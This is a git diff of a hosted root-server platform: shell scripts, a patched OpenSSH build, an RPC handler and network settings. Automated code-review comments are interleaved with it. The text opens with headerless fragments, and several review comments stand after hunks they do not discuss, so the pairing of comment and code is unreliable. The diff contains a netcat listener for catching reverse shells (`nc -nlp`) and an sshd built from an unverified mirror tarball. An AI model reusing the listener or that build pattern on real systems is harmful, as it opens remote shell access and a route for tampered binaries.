PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"' "'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'" -${CN}To force-exit this shell, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} ------------------------------------" +${CN}${CF}-------------------------------------------------------------------------------${CN} +To force-exit this listener, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} on your Root Server" # PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] ' cfg=$(stty --save) stty raw -echo opost -time nc -vnlp "$rport" -echo "Restoring TTY" +echo 
-e "${CDG}Listening on ${CG}${rip}:${rport}${CN}" +nc -nlp "$rport" +echo "🦋 Restoring terminal..." stty "$cfg" # reset -I diff --git a/host/Makefile b/host/Makefile index 07e14d6..4d6f1f6 100644 --- a/host/Makefile +++ b/host/Makefile 
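Review bot: The new first line, `[[ ! -f /config/self/reverse_port ]] && curl sf/port`, neither checks curl's result nor tells the user that a port request was just attempted, so when the request fails the very next `load` bails with "No reverse port found. Try curl sf/port", advising the user to do what the script already did. Chain it so the failure is reported as its own step: `[[ -f /config/self/reverse_port ]] || curl sf/port || ERREXIT 255 "Requesting a reverse port failed."` (if sf/port only signals errors in its body rather than the HTTP status, add `-f` or grep the output accordingly). Dropping `-v` from `nc -nlp "$rport"` also removes the only hint when the bind fails, and with `stty raw -echo` already in effect the user is left with a silent terminal; either keep `-v` or print a line when nc exits non-zero before restoring the tty.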
@@ -1,29 +1,34 @@ + +VER=9.6p1 + all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile docker build --no-cache --network host -t sf-host . albuild: - bash -c "docker run --rm alpine-gcc true || \ - docker commit alpine-gcc alpine-gcc || { \ - docker run --network host --name alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \ - && docker commit alpine-gcc alpine-gcc; }" + bash -c "docker run --rm sf-alpine-gcc true || \ + docker commit sf-alpine-gcc sf-alpine-gcc || { \ + docker run --network host --name sf-alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \ + && docker commit sf-alpine-gcc sf-alpine-gcc; }" # See mk_sshd.sh for manual debugging -fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh - docker run --rm -v$$(pwd):/src --net=host -w /tmp alpine-gcc /src/mk_sshd.sh +fs-root/usr/sbin/sshd: albuild sf-sshd.patch mk_sshd.sh + docker run --rm -v$$(pwd):/src --net=host -w /tmp --env VER=$(VER) sf-alpine-gcc /src/mk_sshd.sh + @echo "Type 'make diff' to create a sf-sshd-$(VER).patch" fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c - docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c + docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c @echo SUCCESS fs-root/bin/unix-socket-client: unix-socket-client.c - docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c + docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c @echo SUCCESS diff: cd dev && \ - diff -x '!*.[ch]' -u openssh-9.2p1-orig/ openssh-9.2p1-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd.patch + diff -x 
'!*.[ch]' -u openssh-$(VER)-orig/ openssh-$(VER)-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd-$(VER).patch + @echo "May want to 'mv sf-sshd-$(VER).patch sf-sshd.patch'." clean: - rm -rf openssh-9.2p1-sf fs-root/usr/sbin/sshd - docker image rm alpine-gcc + rm -rf openssh-$(VER)-orig openssh-$(VER)-sf fs-root/usr/sbin/sshd + docker image rm sf-alpine-gcc diff --git a/host/fs-root/bin/segfaultsh b/host/fs-root/bin/segfaultsh index e8c7f83..7df4ee0 100755 --- a/host/fs-root/bin/segfaultsh +++ b/host/fs-root/bin/segfaultsh @@ -424,7 +424,7 @@ print_goodbye() # Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick # Note: pgrep is executed in user's context. Treat the output with care and do not trust it. - n=$(bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1) + n=$(timeout 2 bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1) [[ -z "$n" ]] && n=0 [[ ${#n} -gt 5 ]] && n=0 [[ ! $n -eq $n ]] && n=0 @@ -435,7 +435,7 @@ print_goodbye() str="process is" [[ "$n" -gt 1 ]] && str="processes are" echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}" - exec_errnull docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done + exec_errnull timeout 2 docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done echo -e "\ -------> The encrypted filesystem in /sec will remain accessible until -------> the last shell exits or all background processes terminate. 
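Review bot: Adding `albuild` as a normal prerequisite of `fs-root/usr/sbin/sshd` makes OpenSSH recompile on every `make`: `albuild` is a recipe with no file of that name and no `.PHONY` declaration, so make treats it as always out of date and rebuilds every target that depends on it even when sf-sshd.patch and mk_sshd.sh are unchanged. Use an order-only prerequisite and declare the phony targets: `fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh | albuild` plus `.PHONY: all albuild diff clean`. In the same hunk, the `sf-alpine-gcc` toolchain image is still created from the floating `alpine` tag, so the compiler and OpenSSL headers used to build the host's sshd change silently between runs; pinning `alpine:<version>@sha256:...` would make the host build reproducible.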
@@ -443,16 +443,6 @@ print_goodbye() -------> This will also make /sec unavailabe until your next log in." fi echo -en "\r" - [[ -z $SF_IS_PAYING ]] && { - echo -e "\ -${CDY}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ -@@@ ${CDG}** GET MORE MEMORY, SPEED, STORAGE AND NO RESTRICTIONS **${CDY} @@@ -@@@ ${CDR}${CUL}https://www.thc.org/segfault/free${CN}${CDY} @@@ -@@@ ${CB}${CUL}https://www.thc.org/segfault/upgrade${CN}${CDY} @@@ -@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@${CN}" - - } - sysmsg "/config/host/etc/logoutmsg-all.sh" echo -e "\ @@ -536,7 +526,7 @@ spawn_shell_exit() tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip" [[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip" # Request a reverse Port Forward - [[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull docker exec --user 0:0 "lg-${LID}" curl -s sf/port + [[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull timeout 2 docker exec --user 0:0 "lg-${LID}" curl -s sf/port # Warn user if this is the last server by IP (after semaphore has been released) 
@@ -1400,7 +1390,7 @@ exec_devnull docker exec sf-master /ready-lg.sh "${LID}" "${C_IP}" "${LG_PID}" " # Setup container (within container's namespace) unset WGNAME_UP [[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")" -exec_devnull docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..." +exec_devnull timeout 5 docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..." touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY" tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip" diff --git a/host/mk_sshd.sh b/host/mk_sshd.sh index 047a7e1..77b4091 100755 --- a/host/mk_sshd.sh +++ b/host/mk_sshd.sh @@ -11,11 +11,17 @@ DSTDIR="/src/fs-root/usr/sbin" DSTBIN="${DSTDIR}/sshd" set -e -SRCDIR="/tmp/openssh-9.2p1" +SRCDIR="/src/dev/openssh-${VER:?}-sf" +[[ ! -d "/src/dev" ]] && mkdir -p "/src/dev" +cd /src/dev [[ ! -d "$SRCDIR" ]] && { # Cloudflare to often returns 503 - "BLOCKED" # wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz - - wget -O- https://artfiles.org/openbsd/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz - + wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz" + tar xfz "openssh-${VER}.tar.gz" + mv "openssh-${VER}" "openssh-${VER}-orig" + tar xfz "openssh-${VER}.tar.gz" + mv "openssh-${VER}" "${SRCDIR}" cd "$SRCDIR" @@ -39,5 +45,5 @@ strip sshd [[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}" cp sshd "${DSTBIN}" chmod 755 "${DSTBIN}" -rm -rf "${SRCDIR:?}" +# rm -rf "${SRCDIR:?}" diff --git a/host/sf-sshd.patch b/host/sf-sshd.patch index 555ba37..e89566a 100644 --- a/host/sf-sshd.patch +++ b/host/sf-sshd.patch 
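Review bot: Wrapping the guest setup in `timeout 5 docker exec ... /sf/bin/sf-setup.sh || STOPEXIT ...` turns a slow setup into a failed login and a torn-down container, and, as far as I know, killing the docker exec client does not signal the process it started, so sf-setup.sh keeps running inside a container that STOPEXIT is about to stop. Five seconds is tight for a script that also brings up WireGuard on a loaded host, which is the same condition the `timeout 2` additions elsewhere in this patch are guarding against. At minimum, surface the timeout in the log so it is not diagnosed as a setup bug: `|| { rc=$?; STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container (rc=${rc}, 124=timeout)..."; }`, and consider making the value a named variable (`${SF_SETUP_TIMEOUT:-5}`) so operators can raise it without editing segfaultsh. This line sits in the middle of a longer setup sequence that starts before and ends after the hunk.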
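Review bot: The sshd that ends up in host/fs-root is built from `wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz"` followed directly by `tar xfz`, with no integrity check, and the download comes from a third-party mirror chosen because the official CDN returned 503s. Since this hunk rewrites that line, it is the moment to add verification: a tampered tarball here becomes the host's SSH daemon. Keep the release hash next to `VER` and check it before extracting, `echo "${SHA256:?}  openssh-${VER}.tar.gz" | sha256sum -c -`, or fetch the upstream `.asc` and verify it with the OpenSSH release key in the build container. Keeping the extracted `openssh-${VER}-orig` tree (the `rm -rf` is now commented out) is fine for `make diff`, but say so in the comment so nobody restores the cleanup and breaks the diff target.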
@@ -1,7 +1,7 @@ -diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-sf/channels.c ---- openssh-9.2p1-orig/channels.c 2023-02-02 12:21:54 -+++ openssh-9.2p1-sf/channels.c 2023-08-15 06:13:05 -@@ -3639,7 +3639,7 @@ +diff -x !*.[ch] -u openssh-9.6p1-orig/channels.c openssh-9.6p1-sf/channels.c +--- openssh-9.6p1-orig/channels.c 2023-12-18 14:59:50 ++++ openssh-9.6p1-sf/channels.c 2024-01-20 17:50:15 +@@ -3683,7 +3683,7 @@ ssh->chanctxt->IPv4or6 = af; } @@ -10,7 +10,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s /* * Determine whether or not a port forward listens to loopback, the * specified address or wildcard. On the client, a specified bind -@@ -3677,6 +3677,7 @@ +@@ -3721,6 +3721,7 @@ * address and it was overridden. */ if (*listen_addr != '\0' && @@ -18,10 +18,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s strcmp(listen_addr, "0.0.0.0") != 0 && strcmp(listen_addr, "*") != 0) { ssh_packet_send_debug(ssh, -diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1-sf/serverloop.c ---- openssh-9.2p1-orig/serverloop.c 2023-02-02 12:21:54 -+++ openssh-9.2p1-sf/serverloop.c 2023-08-15 06:18:17 -@@ -102,6 +102,12 @@ +diff -x !*.[ch] -u openssh-9.6p1-orig/serverloop.c openssh-9.6p1-sf/serverloop.c +--- openssh-9.6p1-orig/serverloop.c 2023-12-18 14:59:50 ++++ openssh-9.6p1-sf/serverloop.c 2024-01-20 17:50:15 +@@ -101,6 +101,12 @@ /* requested tunnel forwarding interface(s), shared with session.c */ char *tun_fwd_ifnames = NULL; @@ -34,7 +34,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1 /* returns 1 if bind to specified port by specified user is permitted */ static int bind_permitted(int port, uid_t uid) -@@ -391,8 +397,10 @@ +@@ -388,8 +394,10 @@ /* Clean up sessions, utmp, etc. */ cleanup_exit(255); } 
@@ -46,7 +46,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1 if (conn_in_ready && process_input(ssh, connection_in) < 0) break; -@@ -637,12 +645,14 @@ +@@ -634,12 +642,14 @@ if (strcmp(ctype, "session") == 0) { c = server_request_session(ssh); @@ -67,7 +67,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1 } if (c != NULL) { debug_f("confirm %s", ctype); -@@ -802,8 +812,20 @@ +@@ -799,8 +809,20 @@ ssh_packet_send_debug(ssh, "Server has disabled port forwarding."); } else { /* Start listening on the port */ @@ -90,10 +90,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1 } if ((resp = sshbuf_new()) == NULL) fatal_f("sshbuf_new"); -diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/sshd.c ---- openssh-9.2p1-orig/sshd.c 2023-02-02 12:21:54 -+++ openssh-9.2p1-sf/sshd.c 2023-08-15 06:13:05 -@@ -536,8 +536,71 @@ +diff -x !*.[ch] -u openssh-9.6p1-orig/sshd.c openssh-9.6p1-sf/sshd.c +--- openssh-9.6p1-orig/sshd.c 2023-12-18 14:59:50 ++++ openssh-9.6p1-sf/sshd.c 2024-01-20 17:50:15 +@@ -531,8 +531,71 @@ return 0; } } @@ -165,7 +165,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/ss privsep_postauth(struct ssh *ssh, Authctxt *authctxt) { #ifdef DISABLE_FD_PASSING -@@ -576,8 +639,34 @@ +@@ -571,8 +634,34 @@ reseed_prngs(); diff --git a/master/cgi-bin/rpc b/master/cgi-bin/rpc index 211d1ca..2595611 100755 --- a/master/cgi-bin/rpc +++ b/master/cgi-bin/rpc @@ -47,6 +47,23 @@ Sanitize() [[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..." } +InitColors() { + # COLOR is set (to 'always') + Y=$CDY + C=$CDC + R=$CDR + RR=$CR + G=$CDG + B=$CB + M=$CDM + YY=$CY + W=$CW + N=$CN + F=$CF + ICON_ERROR="💥 " + ICON_WARN="💥 " +} + GetFormVars() { local IFS 
@@ -71,7 +88,6 @@ GetFormVars() [[ ${key} == "config" ]] && { R_CONFIG="${val//[^[:alnum:]-_+\/.]}" [[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG - [[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}" } [[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}" [[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}" @@ -128,6 +144,9 @@ GetFormVars() [[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}" } done + + [[ -n $COLOR ]] && InitColors + [[ -n "$R_CONFIG" ]] && [[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}" } # Load PID of WireGuard container @@ -685,9 +704,10 @@ BLPOP portd:response-${LID} 5" | redr) || return # The PortD add's a /sf/run/self/reverse_forward. echo -en "\ -${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} -${M}🤭 Tip${N}: Type ${C}rshell${N} -${G}👾 New reverse Port is ${Y}${ipport}${CN}" +${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} for details. +${M}🤭 Tip${N}: Type ${C}rshell${N} to start listening. +${M}🛜 Tip${N}: Type ${C}curl sf/port${N} to assign a new port. +${G}👾 Your reverse Port is ${Y}${ipport}${CN}" # portd.sh automaticaly adds this to /config/self/reverse_* exit @@ -807,22 +827,7 @@ cmd_wg_show() 0<&- # Close STDIN Sanitize GetFormVars -[[ -n $COLOR ]] && { - # COLOR is set (to 'always') - Y=$CDY - C=$CDC - R=$CDR - RR=$CR - G=$CDG - B=$CB - M=$CDM - YY=$CY - W=$CW - N=$CN - F=$CF - ICON_ERROR="💥 " - ICON_WARN="💥 " -} + [[ "${FCGI_CMD}" == "dmesg" ]] && { 
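Review bot: The absolute-path check that now closes GetFormVars still accepts parent-directory segments, because the `config` filter kept as context in the `@@ -71,7 +88,6 @@` hunk (`${val//[^[:alnum:]-_+\/.]}`) lets `.` and `/` through; whether that matters depends on how cmd_ovpn_up resolves R_CONFIG, which is outside this diff. If the value is only ever meant to name a file inside the caller's own filesystem, rejecting it here is cheap: `[[ "$R_CONFIG" == *"/../"* || "$R_CONFIG" == */.. ]] && BAIL "Path must not contain '..'"`. Moving the check after the loop also places it after `InitColors`, so the `${C}`/`${N}` in its message now render, which is presumably the motivation; any BAIL that fires inside the loop above still runs before the colour variables are set, so a short comment such as `# Checks below run after InitColors so BAIL messages can use colours` would save the next reader from re-deriving the ordering. GetFormVars starts outside the hunk.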
@@ -836,13 +841,13 @@ GetFormVars # If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*) [[ -n $SF_OVPN_HACK ]] && { wg_net_init - [[ ${ARGS[1]} == 'vpn' ]] && { - source "/sf/bin/funcs_vpn.sh" - [[ ${ARGS[2]} == 'up' ]] && cmd_vpn_up - [[ ${ARGS[2]} == 'show' ]] && cmd_vpn_show - [[ ${ARGS[2]} == 'del' ]] && cmd_vpn_del - [[ ${ARGS[2]} == 'down' ]] && cmd_vpn_del - cmd_vpn_help + [[ ${ARGS[1]} == 'ovpn' ]] && { + source "/sf/bin/funcs_ovpn.sh" + [[ ${ARGS[2]} == 'up' ]] && cmd_ovpn_up + [[ ${ARGS[2]} == 'show' ]] && cmd_ovpn_show + [[ ${ARGS[2]} == 'del' ]] && cmd_ovpn_del + [[ ${ARGS[2]} == 'down' ]] && cmd_ovpn_del + cmd_ovpn_help exit } } @@ -869,14 +874,14 @@ wg_net_init exit } -[[ "${FCGI_CMD}" == "vpn" ]] && { - source "/sf/bin/funcs_vpn.sh" - [[ ${ARGS[1]} == 'up' ]] && cmd_vpn_up - [[ ${ARGS[1]} == 'show' ]] && cmd_vpn_show - [[ ${ARGS[1]} == 'del' ]] && cmd_vpn_del - [[ ${ARGS[1]} == 'down' ]] && cmd_vpn_del +[[ "${FCGI_CMD}" == "ovpn" ]] && { + source "/sf/bin/funcs_ovpn.sh" + [[ ${ARGS[1]} == 'up' ]] && cmd_ovpn_up + [[ ${ARGS[1]} == 'show' ]] && cmd_ovpn_show + [[ ${ARGS[1]} == 'del' ]] && cmd_ovpn_del + [[ ${ARGS[1]} == 'down' ]] && cmd_ovpn_del # [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show - cmd_vpn_help + cmd_ovpn_help exit } diff --git a/master/ready-lg.sh b/master/ready-lg.sh index ed5f19a..3f24cb0 100755 --- a/master/ready-lg.sh +++ b/master/ready-lg.sh @@ -19,7 +19,9 @@ USER_UL_RATE="$5" LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt" # Create 'empty' for ZSH's prompt to show WG EXIT -[[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}" +# [[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}" +# Overwrite existing. Will be re-created by sf-setup.sh if WG-NET is up still. +:>"${LID_PROMPT_FN}" set -e LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}") diff --git a/provision/env.example b/provision/env.example index b33c7fa..0d2b112 100644 
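Review bot: Changing the match inside the SF_OVPN_HACK block to `[[ ${ARGS[1]} == 'ovpn' ]]` may silently disable the compatibility path the block exists for: the comment above it (kept as context) still says the feature is served via `curl sf/vpn/*`, and if the front-end rewrite only maps a leading `/vpn` segment to `/ovpn`, a legacy request that carries `vpn` as ARGS[1] no longer enters the block and falls through. If the old form is meant to keep working until 2025 as the comment says, match both names: `[[ ${ARGS[1]} == 'ovpn' || ${ARGS[1]} == 'vpn' ]] && {`. The parallel rename in the `@@ -869,14 +874,14 @@` hunk is fine as long as FCGI_CMD is derived from the rewritten URI, which this diff does not show. Note also that `cmd_ovpn_help` in funcs_ovpn.sh still advertises `curl sf/vpn/up` while the handler is now named `ovpn`; pick one canonical spelling for the user-facing text so the help and the handler agree.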
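Review bot: `:>"${LID_PROMPT_FN}"` now truncates the prompt file unconditionally, and it runs before the `${LID:?}` guard on the docker inspect line, so an empty or unset LID would attempt to truncate `/dev/shm/sf/self-for-guest/lg-/prompt` rather than fail early; the earlier `touch` had the same ordering but was not destructive. Add the guard before the first path use, e.g. `: "${LID:?LID is required}"` above this line, or build the path with `${LID:?}` directly. The write also sits before `set -e`, so a missing `lg-${LID}` directory is ignored silently; append `|| exit 1` if the prompt file is required by sf-setup.sh as the new comment implies. The commented-out `touch` line is dead code now that the comment explains the new behaviour and can be dropped.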
--- a/provision/env.example +++ b/provision/env.example @@ -37,7 +37,7 @@ SF_MULLVAD_IP=172.20.0.252 SF_MULLVAD_ROUTE=10.124.0.0/22 SF_NOVPN_IP=172.20.0.240 SF_NGINX_IP=172.20.1.80 -SF_RPC_IP=10.11.0.2 +SF_RPC_IP=100.126.224.2 SF_GSNC_IP=172.22.0.21 SF_SSHD_IP=172.22.0.22 SF_DOH_IP=172.23.0.2 @@ -49,9 +49,9 @@ SF_NET_ONION=10.111.0.0/16 SF_NET_VPN=172.20.0.0/24 SF_NET_VPN_DNS_IP=172.20.0.53 -SF_NET_LG=10.11.0.0/24 -SF_NET_LG_ROUTER_IP=10.11.0.1 -SF_NET_LG_ROUTER_IP_DUMMY=10.11.0.254 +SF_NET_LG=100.126.224.0/22 +SF_NET_LG_ROUTER_IP=100.126.224.1 +SF_NET_LG_ROUTER_IP_DUMMY=100.126.227.254 SF_NET_VPN_ROUTER_IP=172.20.0.2 diff --git a/sfbin/funcs.sh b/sfbin/funcs.sh index d67b8d7..74dcef6 100644 --- a/sfbin/funcs.sh +++ b/sfbin/funcs.sh @@ -5,7 +5,7 @@ CY="\e[1;33m" # yellow CG="\e[1;32m" # green CR="\e[1;31m" # red CC="\e[1;36m" # cyan -# CM="\e[1;35m" # magenta +CM="\e[1;35m" # magenta CW="\e[1;37m" # white CB="\e[1;34m" # blue CF="\e[2m" # faint diff --git a/sfbin/funcs_admin.sh b/sfbin/funcs_admin.sh index 6bc811d..49de824 100644 --- a/sfbin/funcs_admin.sh +++ b/sfbin/funcs_admin.sh @@ -14,6 +14,7 @@ _self_for_guest_dir="${_sf_shmdir}/self-for-guest" _sf_basedir="/sf" _sf_dbdir="${_sf_basedir}/config/db" unset _sf_isinit +_sf_region="$(hostname)" _sf_deinit() { 
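Review bot: The new SF_NET_LG range `100.126.224.0/22` (with SF_RPC_IP and the router addresses inside it) lies in 100.64.0.0/10, the RFC 6598 shared address space used by carrier-grade NAT, so on a host whose provider or upstream already hands out CGNAT addresses these routes can collide with real ones. That may be an acceptable trade-off, but env.example is what operators copy, so a one-line comment next to `SF_NET_LG=` such as `# 100.64.0.0/10 is CGNAT shared space; pick another range if your uplink uses it` would make the choice explicit. The range also grows from /24 to /22; any firewall or routing rules elsewhere that were written for 10.11.0.0/24 need the same update, and this diff does not show them, so that is worth confirming.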
@@ -507,27 +508,29 @@ lgrm() lgban() { local fn + local hn local ip local msg - local lid + local lglid="${1}" _sf_init - lid="${1}" shift 1 - fn="${_self_for_guest_dir}/${lid}/ip" + fn="${_self_for_guest_dir}/${lglid}/ip" [[ -f "$fn" ]] && { ip=$(<"$fn") + fn="${_self_for_guest_dir}/${lglid}/hostname" + [[ -f "${fn}" ]] && hn=$(<"${fn}") fn="${_sf_dbdir}/banned/ip-${ip:0:18}" [[ ! -e "$fn" ]] && { [[ $# -gt 0 ]] && msg="$*\n" - echo -en "$msg" >"${fn}" + echo -en "# ${CY}${hn:-NAME} ${CDY}${_sf_region:-REGION} ${lglid} ${ip:0:18}${CN}\n$msg" >"${fn}" } echo "Banned: $ip" } - lgstop "${lid}" "$@" - #_sf_lgrm "${lid}" # Dont lgrm here and give user chance to explain to re-instate his server. + lgstop "${lglid}" "$@" + #_sf_lgrm "${lglid}" # Dont lgrm here and give user chance to explain to re-instate his server. _sf_deinit } diff --git a/sfbin/funcs_vpn.sh b/sfbin/funcs_ovpn.sh similarity index 99% rename from sfbin/funcs_vpn.sh rename to sfbin/funcs_ovpn.sh index afcc226..d1bce3c 100644 --- a/sfbin/funcs_vpn.sh +++ b/sfbin/funcs_ovpn.sh @@ -6,7 +6,7 @@ [[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80)) -cmd_vpn_help() { +cmd_ovpn_help() { echo -en "\ Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N} Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N} @@ -241,7 +241,7 @@ vpn_stop() { nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null } -cmd_vpn_show() { +cmd_ovpn_show() { load_lg [[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && { echo -e "${C}" @@ -252,12 +252,12 @@ cmd_vpn_show() { exit } -cmd_vpn_up() { +cmd_ovpn_up() { local str load_lg local link_mtu - [[ -z "$R_CONFIG" ]] && cmd_vpn_help + [[ -z "$R_CONFIG" ]] && cmd_ovpn_help WG_DEV="vpnEXIT" # echo "PID=$PID" @@ -379,7 +379,7 @@ Use ${C}curl sf/vpn/down${N} to disconnect. exit } -cmd_vpn_del() { +cmd_ovpn_del() { load_lg vpn_stop
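Review bot: The new ban-file header is written with `echo -en`, so backslash sequences inside `${hn}`, `${lglid}` and `${ip}` are interpreted together with the intended `\e[` colour codes; `hn` is read verbatim from the `self-for-guest/.../hostname` file, so if that name can be influenced by the guest, arbitrary terminal escape sequences end up in a file that is later printed to an operator's terminal. Render the colour variables and the message with `%b` and the data fields with `%s`: `printf '# %b%s %b%s %s %s%b\n%b' "$CY" "${hn:-NAME}" "$CDY" "${_sf_region:-REGION}" "$lglid" "${ip:0:18}" "$CN" "$msg" >"${fn}"`. `hn=$(<"${fn}")` also keeps embedded newlines, so a multi-line hostname file would split the one-line `#` header; `read -r hn <"${fn}"` takes only the first line. lgban is fully contained in the hunk, so the change is self-contained.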